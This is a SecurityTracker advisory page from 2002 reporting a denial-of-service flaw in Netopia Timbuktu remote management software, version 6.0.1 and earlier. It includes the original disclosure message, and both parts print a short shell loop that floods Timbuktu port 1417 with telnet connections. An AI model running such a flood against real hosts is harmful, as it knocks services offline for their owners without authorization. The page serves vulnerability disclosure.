SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Timbuktu Vendors:   Netopia
Netopia Timbuktu Remote Management Software Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1003298
SecurityTracker URL:  http://securitytracker.com/id/1003298
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 19 2002
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 6.0.1 and prior versions
Description:   A denial of service vulnerability was reported in Netopia's Timbuktu remote administration software. A remote user can create denial of service conditions.

A remote user can reported cause all Timbuktu services to crash by opening a large number of connections to Timbuktu via one of its remote access ports (1417 - 1420).

The following demonstration exploit script is provided:

#!/bin/sh

while:
do

telnet [targethost] 1417 &

done

Impact:   A remote user can cause all Timbuktu management services to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.netopia.com/software/products/tb2/ (Links to External Site)
Cause:   Exception handling error, Resource error
Underlying OS:  Apple (Legacy "classic" Mac), UNIX (macOS/OS X), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Timbuktu DoS vulnerabilty






Timbuktu 6.0.1 and Older DoS Advisory
*************************************
Discovered by: Teknophreak of Malloc()
**************************************


E-mail: Tek@superw00t.com



"Timbuktu" is a remote administration suite that is 
available for MacOS and Windows operating 
systems. Timbuktu utilizes a range of ports between 
(1417 - 1420). There exist a Denial of Service 
vulnerability that will crash all timbuktu services
running. 


To exploit this all you must do is choose one of the 
Timbuktu ports that are open and make a large 
number of connections to it and if you keep a watch 
you will see that all the Timbuktu ports available will 
close one by one.

If your admin doesn't mind try this against the 
machine using timbuktu :

#!/bin/sh

while:
do

	telnet tb2.host.com 1417 &

done


This will cause the timbuktu services to die out. 


 



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC